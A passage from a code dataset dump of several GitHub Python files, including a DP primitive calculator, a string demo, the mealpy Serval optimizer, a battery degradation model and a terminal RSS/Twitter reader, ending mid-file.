num_operations[i] = min_ops # and this value is stored in num_operations[i].\n\n\nprint(num_operations[n])\n\n# This second part is a backtracking process to reconstruct the sequence of numbers that leads to the minimum operations.\n# Backtracking the numbers leading to n\nnums = [n]\nwhile n != 1: # loop continues until n becomes 1.\n # Inside the loop, it checks which operation was responsible for reaching the current value of n with the minimum operations.\n # It then updates n and appends the corresponding number to the nums list.\n if n % 3 == 0 and num_operations[n] - 1 == num_operations[n // 3]:\n nums += [n // 3]\n n = n // 3\n elif n % 2 == 0 and num_operations[n] - 1 == num_operations[n // 2]:\n nums += [n // 2]\n n = n // 2\n else:\n nums += [n - 1]\n n = n - 1\n\nprint(\" \".join([str(i) for i in nums][::-1]))\n","repo_name":"pedarias/Coursera_Data_Structures_and_Algorithms_Specialization","sub_path":"Course1_Algorithmic_Toolbox/week5_dynamic_programming1/2_primitive_calculator/primitive_calculator.py","file_name":"primitive_calculator.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36403945707","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\ndef find_string(str, findstr):\n # 查找字符串中指定���子串\n print(\"查找带{}的字符串位置,不存在返回-1,结果:\".format(findstr), str.find(findstr))\n\n\ndef replace_string(str, data, repl):\n # 查找替换\n newstr = str.replace(data, repl)\n print(\"输出一个新的字符串\", newstr)\n\n\nif __name__ == '__main__':\n data = [\"你好\", \"HELLO WORD\"]\n for n in data:\n print(\"字符串的长度为:\", len(n))\n # 查找带H子串的str并返回下标,不存在返回-1\n find_string(n, \"WORD\")\n # 查找WORD替换为Python,找不到既不修改直接赋值\n replace_string(n, \"WORD\", \"PYTHON\")\n print(\"*\" * 100, \"\\n\")\n","repo_name":"TrellixVulnTeam/PythonDemo_IQ8M","sub_path":"Python05StringMethodDemo/String_05_find_string_method.py","file_name":"String_05_find_string_method.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44019459510","text":"n=int(input())\nal=list(map(int, input().split()))\n\nfrom itertools import product\nite = list(product(range(2),repeat=n-1))\nans=10**18\nfor pattern in ite:\n xors=0\n val=0\n # flag=False\n for i, v in enumerate(pattern):\n a=al[i]\n val=val|a\n if v: \n flag=True\n xors=xors^val\n val=0\n # else:\n # val=\n val=val|al[-1]\n xors=xors^val\n ans=min(ans,xors)\nprint(ans)","repo_name":"nami4mo/competitive-programming-problems","sub_path":"algo_contest/previous/abc197/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2111400751","text":"#!/usr/bin/env python\n# Created by \"Thieu\" at 21:34, 11/03/2023 ----------%\n# Email: nguyenthieu2102@gmail.com % \n# Github: https://github.com/thieu1995 % \n# --------------------------------------------------%\n\nimport numpy as np\nfrom mealpy.optimizer import Optimizer\n\n\nclass OriginalServalOA(Optimizer):\n \"\"\"\n The original version of: Serval Optimization Algorithm (ServalOA)\n\n Links:\n 1. https://www.mdpi.com/2313-7673/7/4/204\n\n Notes:\n 0. It's concerning that the author seems to be reusing the same algorithms with minor variations.\n 1. Algorithm design is similar to Zebra Optimization Algorithm (ZOA), Osprey Optimization Algorithm (OOA), Coati Optimization Algorithm (CoatiOA), Siberian Tiger Optimization (STO), Language Education Optimization (LEO), Pelican Optimization Algorithm (POA), Walrus Optimization Algorithm (WOA), Fennec Fox Optimization (FFO), Three-periods optimization algorithm (TPOA), Teamwork optimization algorithm (TOA), Northern goshawk optimization (NGO), Tasmanian devil optimization (TDO), Archery algorithm (AA), Cat and mouse based optimizer (CMBO)\n 3. It may be useful to compare the Matlab code of this algorithm with those of the similar algorithms to ensure its accuracy and completeness.\n 4. The article may share some similarities with previous work by the same authors, further investigation may be warranted to verify the benchmark results reported in the papers and ensure their reliability and accuracy.\n\n Examples\n ~~~~~~~~\n >>> import numpy as np\n >>> from mealpy.swarm_based.ServalOA import OriginalServalOA\n >>>\n >>> def fitness_function(solution):\n >>> return np.sum(solution**2)\n >>>\n >>> problem_dict1 = {\n >>> \"fit_func\": fitness_function,\n >>> \"lb\": [-10, -15, -4, -2, -8],\n >>> \"ub\": [10, 15, 12, 8, 20],\n >>> \"minmax\": \"min\",\n >>> }\n >>>\n >>> epoch = 1000\n >>> pop_size = 50\n >>> model = OriginalServalOA(epoch, pop_size)\n >>> best_position, best_fitness = model.solve(problem_dict1)\n >>> print(f\"Solution: {best_position}, Fitness: {best_fitness}\")\n\n References\n ~~~~~~~~~~\n [1] Dehghani, M., & Trojovský, P. (2022). Serval Optimization Algorithm: A New Bio-Inspired\n Approach for Solving Optimization Problems. Biomimetics, 7(4), 204.\n \"\"\"\n def __init__(self, epoch=10000, pop_size=100, **kwargs):\n \"\"\"\n Args:\n epoch (int): maximum number of iterations, default = 10000\n pop_size (int): number of population size, default = 100\n \"\"\"\n super().__init__(**kwargs)\n self.epoch = self.validator.check_int(\"epoch\", epoch, [1, 100000])\n self.pop_size = self.validator.check_int(\"pop_size\", pop_size, [10, 10000])\n self.set_parameters([\"epoch\", \"pop_size\"])\n self.support_parallel_modes = False\n self.sort_flag = False\n\n def evolve(self, epoch):\n \"\"\"\n The main operations (equations) of algorithm. Inherit from Optimizer class\n\n Args:\n epoch (int): The current iteration\n \"\"\"\n kk = np.random.permutation(self.pop_size)[0]\n for idx in range(0, self.pop_size):\n # Phase 1: Prey Selection and Attacking (Exploration)\n pos_new = self.pop[idx][self.ID_POS] + np.random.rand(self.problem.n_dims) * \\\n (self.pop[kk][self.ID_POS] - np.random.randint(1, 3, self.problem.n_dims) * self.pop[idx][self.ID_POS])\n pos_new = self.amend_position(pos_new, self.problem.lb, self.problem.ub)\n tar_new = self.get_target_wrapper(pos_new)\n if self.compare_agent([pos_new, tar_new], self.pop[idx]):\n self.pop[idx] = [pos_new, tar_new]\n\n # Phase 2: Chase Process (Exploitation)\n pos_new = self.pop[idx][self.ID_POS] + np.random.randint(1, 3, self.problem.n_dims) * (self.problem.ub - self.problem.lb) / (epoch+1) # Eq. 6\n pos_new = self.amend_position(pos_new, self.problem.lb, self.problem.ub)\n tar_new = self.get_target_wrapper(pos_new)\n if self.compare_agent([pos_new, tar_new], self.pop[idx]):\n self.pop[idx] = [pos_new, tar_new]\n","repo_name":"thieu1995/mealpy","sub_path":"mealpy/swarm_based/ServalOA.py","file_name":"ServalOA.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":587,"dataset":"github-code","pt":"40"} +{"seq_id":"74930873399","text":"import numpy as np\nimport rainflow\nfrom settings import DT as dt\n\nclass Battery:\n def __init__(self, Emax, Emin, Pmax, Pmin, eff, soc_ini, degModel=\"constant\"):\n self.Emax = Emax\n self.Emin = Emin\n self.Pmax = Pmax\n self.Pmin = Pmin\n self.Eini = soc_ini*self.Emax\n self.E = self.Eini\n self.eff = eff\n self.degModel = degModel\n \n def charge(self, dp_tgt):\n \n assert dp_tgt >= 0\n dp_tgt = min(dp_tgt, abs(self.Pmin))\n dE_pre = dp_tgt*dt - (1-np.sqrt(self.eff))*dp_tgt*dt\n room = self.Emax - self.E\n \n if room >= dE_pre:\n dE = dE_pre\n dp = dp_tgt \n else:\n dE = room\n dp = dE/(np.sqrt(self.eff)*dt)\n\n self.E += dE\n \n return dp\n \n def discharge(self, dp_tgt):\n \n assert dp_tgt >= 0\n dp_tgt = min(dp_tgt, self.Pmax)\n dE_pre = dp_tgt*dt + (1-np.sqrt(self.eff))*dp_tgt*dt\n reserve = self.E - self.Emin\n \n if reserve >= dE_pre:\n dE = dE_pre\n dp = dp_tgt\n else:\n dE = reserve\n dp = dE/((2-np.sqrt(self.eff))*dt)\n \n self.E -= dE\n return dp\n \n def degradate(self, degCap=0.05, degEff=0.02, Es=np.zeros(8640,), xs=np.zeros(8640,)):\n \n if self.degModel == \"constant\":\n self.Emax *= (1-degCap)\n self.eff *= (1-degEff)\n \n elif self.degModel == \"Xu\":\n kd1 = 1.4e5\n kd2 = -0.501e1\n kd3 = -1.23e5\n\n ks = 1.04\n SoC_ref = 0.50\n\n kt = 4.14e-10 # per second\n\n kT = 6.93e-2\n T_ref = 25\n\n fd = 0\n socs = Es/self.Emax\n cycles = rainflow.count_cycles(socs)\n\n # calendar aging\n Stime = kt*3600*8640 # 3600s per hour and 8640 hours per year\n fd += Stime\n\n # stress aging\n for depth, number in cycles:\n Sdod = (kd1*depth**kd2 + kd3)**-1 * number\n #Ssoc = np.exp(ks*(socs.mean()-SoC_ref))\n Ssoc = 1\n #Stemp = np.exp(kT*(T-T_ref)*(T_ref/T))\n Stemp = 1\n fd += Sdod*Ssoc*Stemp\n\n degCap = 1-np.exp(-fd)\n self.Emax *= (1-degCap)\n self.eff *= (1-degEff)\n \n elif self.degModel == \"Wang\":\n b = 31630\n T = 288\n R = 8.3145\n C_rate = 0.5\n if self.Emax > 0:\n Ah = np.abs(xs).sum()*dt/self.Emax\n else:\n Ah = 0\n\n if self.Emax < 0.7*self.Eini:\n print('Battery should be retired')\n\n degCap = b * np.exp((-31700 + 370.3*C_rate)/(R*T)) * (Ah**0.55)\n degCap /= 100\n self.Emax *= (1-degCap)\n self.eff *= (1-degEff)\n else:\n print(\"Degradation model not in the list of [constant, Xu, Wang], please specify.\")\n ","repo_name":"zuzhaoye/BESS-sizing","sub_path":"battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11293508711","text":"import json\nimport os\nimport re\nimport sys\nimport signal\nimport threading\nimport time\nimport urllib.request\nimport webbrowser\n\nfrom asciimatics.screen import Screen\nfrom asciimatics.effects import Print\nfrom asciimatics.scene import Scene\nfrom asciimatics.renderers import ColourImageFile, SpeechBubble\n\nfrom .common import p, FEEDS_FILE_NAME\nfrom .get_twitter import do as get_twitter_feeds\nfrom .get_rss import do as get_feeds_from_rss\n\n\nKEY = {\n \"up\": -204,\n \"down\": -206,\n \"shiftUp\": 337,\n \"shiftDown\": 336,\n \"enter\": 10,\n \"space\": 32,\n \"tab\": -301,\n \"shiftTab\": -302,\n \"backspace\": -300,\n \"esc\": -1,\n \":\": ord(\":\"),\n \"h\": [ord(\"h\"), ord(\"H\")],\n \"?\": ord(\"?\"),\n \"r\": [ord(\"r\"), ord(\"R\")],\n \"s\": [ord(\"s\"), ord(\"S\")],\n \"w\": [ord(\"w\"), ord(\"W\")],\n \"j\": [ord(\"j\"), ord(\"J\")],\n \"k\": [ord(\"k\"), ord(\"K\")],\n \"o\": [ord(\"o\"), ord(\"O\")],\n \"q\": [ord(\"q\"), ord(\"Q\")],\n}\n\nKEYLIST = {\n \"arrow\": [KEY[\"up\"], KEY[\"down\"], KEY[\"shiftUp\"], KEY[\"shiftDown\"], KEY[\"esc\"]]\n + KEY[\"s\"]\n + KEY[\"w\"]\n + KEY[\"j\"]\n + KEY[\"k\"],\n \"number\": range(48, 58),\n}\n\nCONFIG = {\n \"color\": 16,\n \"mode\": \"list\",\n \"rowlimit\": -1,\n \"marqueeFields\": [\"title\", \"text\"],\n \"marqueeSpeed\": 20,\n \"marqueeSpeedReturn\": 400,\n \"marqueeDelay\": 40,\n \"marqueeDelayReturn\": 120,\n \"refresh\": 120, # twitter & RSS pooling interval (seconds)\n \"categories\": (),\n}\n\nif \"256\" in os.environ.get(\"TERM\", \"\"):\n CONFIG[\"color\"] = 256\n\nCOLOR = {\n \"default\": 7,\n \"number\": 7,\n \"numberselected\": 15,\n \"source\": 11,\n \"bluesource\": 3,\n \"time\": 8,\n \"selected\": 7,\n \"alertfg\": 15,\n \"alertbg\": 4,\n \"categoryfg\": 3,\n \"categorybg\": 0,\n \"categoryfgS\": 0,\n \"categorybgS\": 3,\n}\n\n\nif CONFIG[\"color\"] == 256:\n\n COLOR = {\n \"default\": 7,\n \"number\": 8,\n \"numberselected\": 15,\n \"source\": 2,\n \"bluesource\": 105,\n \"RTheaderS\": 6,\n \"time\": 8,\n \"selected\": 15,\n \"alertfg\": 15,\n \"alertbg\": 12,\n \"categoryfg\": 223,\n \"categorybg\": 235,\n \"categoryfgS\": 235,\n \"categorybgS\": 223,\n }\n\n# FIELDS syntax : (column, field, color key, space fill)\n\nFIELDS = {\n \"default\": [\n (1, \"sourceName\", \"source\", True),\n (20, \"title\"),\n (-1, \"pubDate\", \"time\"),\n ],\n \"twitter\": [\n (1, \"nickname\", \"bluesource\", True),\n (18, \"isLink\", \"default\"),\n (21, \"text\", \"default\"),\n (21, \"RTheader\", \"RTheader\"),\n (-1, \"pubDate\", \"time\"),\n ],\n}\n\ndata, CURRENT = {}, {}\n\nos.environ.setdefault(\"ESCDELAY\", \"10\")\n\n\ndef get_data(category=\"news\"):\n\n if category != \"twitter\":\n try:\n with open(os.path.join(p[\"path_data\"], \"rss_%s.json\" % category), \"r\") as c:\n d = json.load(c)\n except:\n d = get_feeds_from_rss(category)\n if not d:\n sys.exit(\"oops 1\")\n return d\n\n if os.path.isfile(os.path.join(p[\"path_data\"], \"oauth_twitter\")):\n try:\n with open(os.path.join(p[\"path_data\"], \"twitter_home.json\"), \"r\") as c:\n return json.load(c)\n except:\n pass\n\n try:\n d = get_twitter_feeds()\n if not d:\n sys.exit(\"oops 2\")\n return d\n except Exception as e:\n sys.exit(str(e))\n\n return None\n\n\ndef layout(screen):\n\n global data, CURRENT\n\n def reload_data():\n\n global data, CURRENT\n\n while True:\n\n time.sleep(1)\n\n c_category = CURRENT.get(\"category\")\n\n if (\n c_category in data\n and data[c_category] is not None\n and data[c_category].get(\"created_at\")\n and int(data[c_category].get(\"created_at\")) + CONFIG[\"refresh\"]\n < int(time.time())\n and not CONFIG.get(\"loading\")\n ):\n\n CONFIG[\"loading\"] = True\n\n alert(screen, \"UPDATING\")\n\n if c_category == \"twitter\":\n try:\n d = get_twitter_feeds(page=1)\n except Exception as e:\n CONFIG[\"loading\"] = False\n alert(screen, str(e))\n time.sleep(0.5)\n if c_category not in data:\n data[c_category] = {}\n data[c_category][\"created_at\"] = int(time.time())\n return\n else:\n d = get_feeds_from_rss(CURRENT[\"category\"])\n\n if not d:\n CONFIG[\"loading\"] = False\n alert(\n screen,\n \"Api limit exceeded\"\n if c_category == \"twitter\"\n else \"Update failed\",\n )\n time.sleep(0.5)\n if c_category not in data:\n data[c_category] = {}\n data[c_category][\"created_at\"] = int(time.time())\n return\n\n CONFIG[\"loading\"] = False\n\n data[c_category] = d\n\n if c_category != CURRENT[\"category\"]:\n return\n\n if CURRENT[\"line\"][CURRENT[\"category\"]] > -1:\n i = -1\n for entry in data[c_category][\"entries\"]:\n i += 1\n if entry[\"id\"] == CURRENT[\"id\"]:\n CURRENT[\"line\"][CURRENT[\"category\"]] = i\n break\n CURRENT[\"line\"][CURRENT[\"category\"]] = i\n\n draw_categories()\n draw_entries(force=True)\n screen.refresh()\n\n def is_double_char(s):\n\n return (\n re.compile(\n \"(\\u00a9|\\u00ae|[\\u2000-\\u3300]|\\ud83c[\\ud000-\\udfff]|\\ud83d[\\ud000-\\udfff]|\\ud83e[\\ud000-\\udfff]|[가-힣]|[\\u4e00-\\u9fff]|[\\u3400-\\u4dbf]|[\\U00020000-\\U0002a6df]|[\\U0002a700-\\U0002b73f]|[\\U0002b740-\\U0002b81f]|[\\U0002b820-\\U0002ceaf])\"\n ).findall(s)\n != []\n )\n\n def text_length(s):\n\n return sum([2 if is_double_char(d) else 1 for d in s])\n\n def alert(screen, text):\n\n space = 3\n length = text_length(text) + space * 2\n text = \" \" * space + text + \" \" * space\n pos = (screen.width - len(text), 0)\n\n screen.print_at(\n text, pos[0], pos[1], colour=COLOR[\"alertfg\"], bg=COLOR[\"alertbg\"]\n )\n screen.refresh()\n\n def slice_text(s, l, max_width=80, shift=0):\n rslt = \"\"\n\n string_length = text_length(s)\n\n over = string_length > max_width\n\n if over: # to show a marquee\n if (\n string_length - shift + CONFIG[\"marqueeDelayReturn\"] < max_width\n or shift == -1\n ):\n if CURRENT.get(\"direction\", \"left\") == \"left\":\n CURRENT[\"direction\"] = \"right\"\n else:\n CURRENT[\"direction\"] = \"left\"\n\n if CURRENT.get(\"direction\", \"left\") == \"left\":\n if shift < CONFIG[\"marqueeDelay\"]:\n shift = 0\n else:\n shift -= CONFIG[\"marqueeDelay\"]\n\n if string_length - shift + max_width / 4 < max_width:\n shift = string_length - max_width + max_width / 4\n\n m = 0\n for d in s:\n m += 1\n if is_double_char(d):\n m += 1\n if not over:\n rslt += d\n else:\n if m == shift and is_double_char(d):\n rslt += \" \"\n elif m >= shift:\n rslt += d\n\n if m >= l + shift or m >= max_width + shift:\n break\n\n return rslt\n\n def draw_categories():\n\n screen.print_at(\n \".\" * screen.width, 0, 0, colour=COLOR[\"categorybg\"], bg=COLOR[\"categorybg\"]\n )\n\n x = 1\n for category in CONFIG[\"categories\"]:\n s = \" %s \" % category[1]\n if category[0] == CURRENT[\"category\"]:\n screen.print_at(\n s, x, 0, colour=COLOR[\"categoryfgS\"], bg=COLOR[\"categorybgS\"]\n )\n else:\n screen.print_at(\n s, x, 0, colour=COLOR[\"categoryfg\"], bg=COLOR[\"categorybg\"]\n )\n\n x += len(s) + 2\n\n def draw_entries(clearline=False, force=False, lines=False):\n\n category_ = CURRENT[\"category\"]\n if category_ not in FIELDS:\n category_ = \"default\"\n\n if data[CURRENT[\"category\"]] is None:\n return\n\n line_range = range(0, CONFIG[\"rowlimit\"])\n\n if lines:\n line_range = range(0, lines)\n\n elif CURRENT[\"line\"][CURRENT[\"category\"]] > -1 and not force:\n line_range = [CURRENT[\"line\"][CURRENT[\"category\"]]]\n if (\n CURRENT[\"oline\"] != CURRENT[\"line\"][CURRENT[\"category\"]]\n and CURRENT[\"oline\"] != -1\n ):\n line_range = [CURRENT[\"oline\"], CURRENT[\"line\"][CURRENT[\"category\"]]]\n\n for i in line_range:\n is_selected = (\n i == CURRENT[\"line\"][CURRENT[\"category\"]]\n ) and not CURRENT.get(\"input\", False)\n row = i + 1\n index = i + CURRENT[\"page\"][CURRENT[\"category\"]] * (screen.height - 2)\n\n if is_selected:\n screen.print_at(\n \" \" * screen.width,\n 0,\n row,\n colour=COLOR[\"selected\"],\n bg=COLOR[\"selected\"],\n )\n else:\n screen.print_at(\" \" * screen.width, 0, row, colour=0, bg=0)\n\n if (\n CURRENT[\"line\"][CURRENT[\"category\"]] > -1\n and clearline\n and not force\n and not is_selected\n ):\n screen.refresh()\n\n for f in FIELDS[category_]:\n kcolor = 2 if len(f) > 2 else 1\n\n txt = data[CURRENT[\"category\"]][\"entries\"][index].get(f[1], \"\")\n\n if (\n is_selected\n and f[1] + \"S\" in data[CURRENT[\"category\"]][\"entries\"][index]\n ):\n txt = data[CURRENT[\"category\"]][\"entries\"][index][f[1] + \"S\"]\n if f[1] in data[CURRENT[\"category\"]][\"entries\"][index] and len(\n data[CURRENT[\"category\"]][\"entries\"][index][f[1]]\n ) > len(txt):\n\n txt += \" \" * (\n len(data[CURRENT[\"category\"]][\"entries\"][index][f[1]])\n - len(txt)\n )\n\n if txt == \"\":\n continue\n\n col = f[0]\n\n if col < 0:\n col = screen.width + col - len(txt)\n elif CURRENT.get(\"input\", False):\n col += 4\n\n fg = COLOR.get(f[kcolor], COLOR[\"default\"])\n bg = 0\n\n if i == CURRENT[\"line\"][CURRENT[\"category\"]] and not CURRENT.get(\n \"input\", False\n ):\n fg = 0\n bg = COLOR[\"selected\"]\n if COLOR.get(\"%sS\" % f[kcolor], None):\n fg = COLOR[\"%sS\" % f[kcolor]]\n\n if is_selected and f[1] in CONFIG[\"marqueeFields\"]:\n txt = slice_text(\n txt,\n screen.width - col - 1,\n max_width=screen.width - col,\n shift=CURRENT[\"shift\"],\n )\n\n if col > 1:\n col -= 1\n txt = \" %s \" % txt\n\n if len(f) > 3:\n txt += \" \" * 20\n\n try:\n screen.print_at(txt, col, row, colour=fg, bg=bg)\n except:\n pass\n\n if (\n CURRENT[\"line\"][CURRENT[\"category\"]] > -1\n and clearline\n and not force\n and not is_selected\n ):\n screen.refresh()\n\n if force and line_range[-1] + 1 < screen.height - 1:\n for i in range(line_range[-1] + 2, screen.height):\n screen.print_at(\" \" * screen.width, 0, i, colour=0, bg=0)\n\n screen.refresh()\n\n def page_up():\n if CURRENT[\"page\"][CURRENT[\"category\"]] == 0:\n CURRENT[\"line\"][CURRENT[\"category\"]] = 0\n alert(screen, \"top of the list\")\n time.sleep(0.5)\n draw_categories()\n else:\n CURRENT[\"line\"][CURRENT[\"category\"]] = CONFIG[\"rowlimit\"] - 1\n CURRENT[\"page\"][CURRENT[\"category\"]] -= 1\n CONFIG[\"rowlimit\"] = screen.height - 2\n\n def page_down():\n if (\n len(data[CURRENT[\"category\"]][\"entries\"])\n - (CURRENT[\"page\"][CURRENT[\"category\"]] + 1) * (screen.height - 2)\n < CONFIG[\"rowlimit\"]\n ):\n CURRENT[\"line\"][CURRENT[\"category\"]] = CONFIG[\"rowlimit\"] - 1\n alert(screen, \"end of the list\")\n time.sleep(0.5)\n draw_categories()\n else:\n CURRENT[\"line\"][CURRENT[\"category\"]] = 0\n CURRENT[\"page\"][CURRENT[\"category\"]] += 1\n CONFIG[\"rowlimit\"] = screen.height - 2\n\n def do_timer():\n if CURRENT[\"line\"][CURRENT[\"category\"]] > -1:\n CURRENT[\"shift\"] = CURRENT.get(\"shift\", 0) + (\n 1 if CURRENT.get(\"direction\", \"left\") == \"left\" else -1\n )\n draw_entries()\n screen.refresh()\n\n def reset_list_arrow_key():\n CURRENT[\"shift\"] = 0\n CURRENT[\"oline\"] = CURRENT[\"line\"][CURRENT[\"category\"]]\n\n def show_current_input_number():\n\n line_range = range(0, CONFIG[\"rowlimit\"])\n\n try:\n currentNumber = int(CURRENT[\"inputnumber\"])\n except:\n currentNumber = \"\"\n\n for i in line_range:\n fg = COLOR[\"number\"]\n if i + 1 == currentNumber:\n fg = COLOR[\"numberselected\"]\n screen.print_at((\"%3s\" % (i + 1)).rjust(3), 1, i + 1, colour=fg, bg=0)\n\n screen.refresh()\n\n def off_number_mode():\n CURRENT[\"shift\"] = 0\n CURRENT[\"input\"] = False\n CURRENT[\"inputnumber\"] = \"\"\n\n draw_entries(clearline=True, force=True)\n screen.refresh()\n\n def open_url(cn):\n\n if \"link\" in cn:\n webbrowser.open(cn[\"link\"], new=2)\n elif \"url\" in cn:\n webbrowser.open(cn[\"url\"], new=2)\n elif \"links\" in cn:\n if len(cn[\"links\"]) == 1:\n webbrowser.open(cn[\"links\"][0], new=2)\n else:\n webbrowser.open(cn[\"permalink\"], new=2)\n elif \"permalink\" in cn:\n webbrowser.open(cn[\"permalink\"], new=2)\n else:\n return False\n\n return True\n\n def show_help():\n w = 60\n s = \"\"\"\n [Up], [Down], [W], [S], [J], [K] : Select from list\n[Shift]+[Up], [Shift]+[Down], [PgUp], [PgDn] : Quickly select from list\n [Space] : Open attached image or URL\n [O] : Open canonical link\n [:] : Select by typing a number from list\n [Tab], [Shift]+[Tab] : Change the category tab\n [Q], [Ctrl]+[C] : Quit\n\"\"\"\n\n s = s.split(\"\\n\")\n lines = len(s)\n width = max([len(d) for d in s]) + 2\n\n screen.clear()\n top = int(screen.height / 2 - lines / 2)\n left = int(screen.width / 2 - width / 2)\n for i, d in enumerate(s):\n screen.print_at(\n \" \" * width,\n left - 1,\n top + i,\n colour=COLOR[\"alertfg\"],\n bg=COLOR[\"alertbg\"],\n )\n screen.print_at(\n d, left, top + i, colour=COLOR[\"alertfg\"], bg=COLOR[\"alertbg\"]\n )\n\n screen.refresh()\n idx = 0\n while True:\n if screen.get_key():\n return\n time.sleep(0.5)\n\n screen.clear()\n\n reload_loop = threading.Thread(target=reload_data, args=[])\n reload_loop.daemon = True\n reload_loop.start()\n\n CURRENT = {\n \"line\": {category[0]: -1 for category in CONFIG[\"categories\"]},\n \"column\": -1,\n \"category\": \"twitter\",\n \"page\": {category[0]: 0 for category in CONFIG[\"categories\"]},\n }\n\n data[CURRENT[\"category\"]] = get_data(CURRENT[\"category\"])\n\n CONFIG[\"rowlimit\"] = screen.height - 2\n if (\n data.get(CURRENT[\"category\"]) is not None\n and len(data[CURRENT[\"category\"]].get(\"entries\", [])) < CONFIG[\"rowlimit\"]\n ):\n CONFIG[\"rowlimit\"] = len(data[CURRENT[\"category\"]][\"entries\"])\n\n if CONFIG[\"rowlimit\"] > 999:\n CONFIG[\"rowlimit\"] = 999\n\n screen.clear()\n draw_categories()\n draw_entries(force=True)\n screen.refresh()\n\n current_time = int(time.time() * CONFIG[\"marqueeSpeed\"])\n\n while True:\n\n time.sleep(0.02)\n\n keycode = screen.get_key()\n\n if keycode:\n\n if keycode == KEY[\"esc\"] or keycode in KEY[\"q\"]:\n screen.clear()\n screen.refresh()\n return True\n\n elif CURRENT.get(\"input\"):\n if keycode == KEY[\"enter\"] or keycode == KEY[\":\"]:\n\n if (\n keycode == KEY[\"enter\"]\n and CURRENT[\"inputnumber\"] != \"\"\n and int(CURRENT[\"inputnumber\"]) <= CONFIG[\"rowlimit\"]\n ):\n CURRENT[\"line\"][CURRENT[\"category\"]] = (\n int(CURRENT[\"inputnumber\"]) - 1\n )\n else:\n CURRENT[\"line\"][CURRENT[\"category\"]] = CURRENT[\"oline\"]\n\n off_number_mode()\n continue\n\n elif keycode in KEYLIST[\"number\"]:\n if len(CURRENT[\"inputnumber\"]) < 3:\n CURRENT[\"inputnumber\"] += str(keycode - KEYLIST[\"number\"][0])\n\n elif keycode == KEY[\"backspace\"]:\n if CURRENT[\"inputnumber\"] != \"\":\n CURRENT[\"inputnumber\"] = CURRENT[\"inputnumber\"][:-1]\n else:\n CURRENT[\"line\"][CURRENT[\"category\"]] = CURRENT[\"oline\"]\n off_number_mode()\n continue\n\n show_current_input_number()\n\n continue\n\n elif keycode in KEY[\"r\"]:\n CURRENT[\"line\"][CURRENT[\"category\"]] = -1\n data[CURRENT[\"category\"]] = get_data(CURRENT[\"category\"])\n CONFIG[\"rowlimit\"] = screen.height - 2\n if len(data[CURRENT[\"category\"]][\"entries\"]) < CONFIG[\"rowlimit\"]:\n CONFIG[\"rowlimit\"] = len(data[CURRENT[\"category\"]][\"entries\"])\n draw_entries()\n screen.refresh()\n\n elif keycode == KEY[\"esc\"]:\n reset_list_arrow_key()\n CURRENT[\"line\"][CURRENT[\"category\"]] = -1\n\n elif keycode == KEY[\"down\"] or keycode in KEY[\"j\"] + KEY[\"s\"]:\n reset_list_arrow_key()\n CURRENT[\"line\"][CURRENT[\"category\"]] += 1\n if CURRENT[\"line\"][CURRENT[\"category\"]] >= CONFIG[\"rowlimit\"]:\n page_down()\n draw_entries(force=True)\n screen.refresh()\n\n elif keycode == KEY[\"up\"] or keycode in KEY[\"k\"] + KEY[\"w\"]:\n reset_list_arrow_key()\n CURRENT[\"line\"][CURRENT[\"category\"]] -= 1\n if CURRENT[\"line\"][CURRENT[\"category\"]] < 0:\n page_up()\n draw_entries(force=True)\n screen.refresh()\n\n elif keycode == KEY[\"shiftUp\"]:\n reset_list_arrow_key()\n CURRENT[\"line\"][CURRENT[\"category\"]] -= 10\n if CURRENT[\"line\"][CURRENT[\"category\"]] < 0:\n page_up()\n draw_entries(force=True)\n screen.refresh()\n\n elif keycode == KEY[\"shiftDown\"]:\n CURRENT[\"shift\"] = 0\n CURRENT[\"oline\"] = CURRENT[\"line\"][CURRENT[\"category\"]]\n CURRENT[\"line\"][CURRENT[\"category\"]] += 10\n if CURRENT[\"line\"][CURRENT[\"category\"]] >= CONFIG[\"rowlimit\"]:\n page_down()\n draw_entries(force=True)\n screen.refresh()\n\n elif keycode in KEY[\"o\"]:\n open_url(\n data[CURRENT[\"category\"]][\"entries\"][\n CURRENT[\"line\"][CURRENT[\"category\"]]\n + CURRENT[\"page\"][CURRENT[\"category\"]] * (screen.height - 2)\n ]\n )\n\n elif keycode == KEY[\"space\"]:\n cn = data[CURRENT[\"category\"]][\"entries\"][\n CURRENT[\"line\"][CURRENT[\"category\"]]\n + CURRENT[\"page\"][CURRENT[\"category\"]] * (screen.height - 2)\n ]\n\n if \"medias\" in cn and not CURRENT.get(\"media\", False):\n for url in cn[\"medias\"]:\n urllib.request.urlretrieve(url, \".rterm_tmp.jpg\")\n\n effect = Print(\n screen,\n ColourImageFile(\n screen,\n \".rterm_tmp.jpg\",\n height=screen.height,\n bg=0,\n fill_background=0,\n dither=False,\n uni=True,\n ),\n y=0,\n )\n\n screen.play(\n [Scene([effect])], stop_on_resize=True, repeat=False\n )\n os.remove(\".rterm_tmp.jpg\")\n\n screen.clear()\n draw_categories()\n draw_entries(force=True)\n screen.refresh()\n else:\n open_url(cn)\n\n elif keycode == KEY[\":\"]:\n CURRENT[\"input\"] = True\n CURRENT[\"oline\"] = CURRENT[\"line\"][CURRENT[\"category\"]]\n CURRENT[\"line\"][CURRENT[\"category\"]] = -1\n CURRENT[\"inputnumber\"] = \"\"\n\n draw_entries(clearline=True, force=True)\n show_current_input_number()\n screen.refresh()\n\n elif keycode in KEY[\"h\"] or keycode == KEY[\"?\"]:\n show_help()\n draw_categories()\n draw_entries(clearline=True, force=True)\n screen.refresh()\n\n elif keycode in [KEY[\"tab\"], KEY[\"shiftTab\"]]:\n for idx, d in enumerate(CONFIG[\"categories\"]):\n if CURRENT[\"category\"] == d[0]:\n try:\n CURRENT[\"category\"] = CONFIG[\"categories\"][\n idx + (1 if keycode == KEY[\"tab\"] else -1)\n ][0]\n except:\n CURRENT[\"category\"] = CONFIG[\"categories\"][\n 0 if keycode == KEY[\"tab\"] else -1\n ][0]\n break\n\n draw_categories()\n 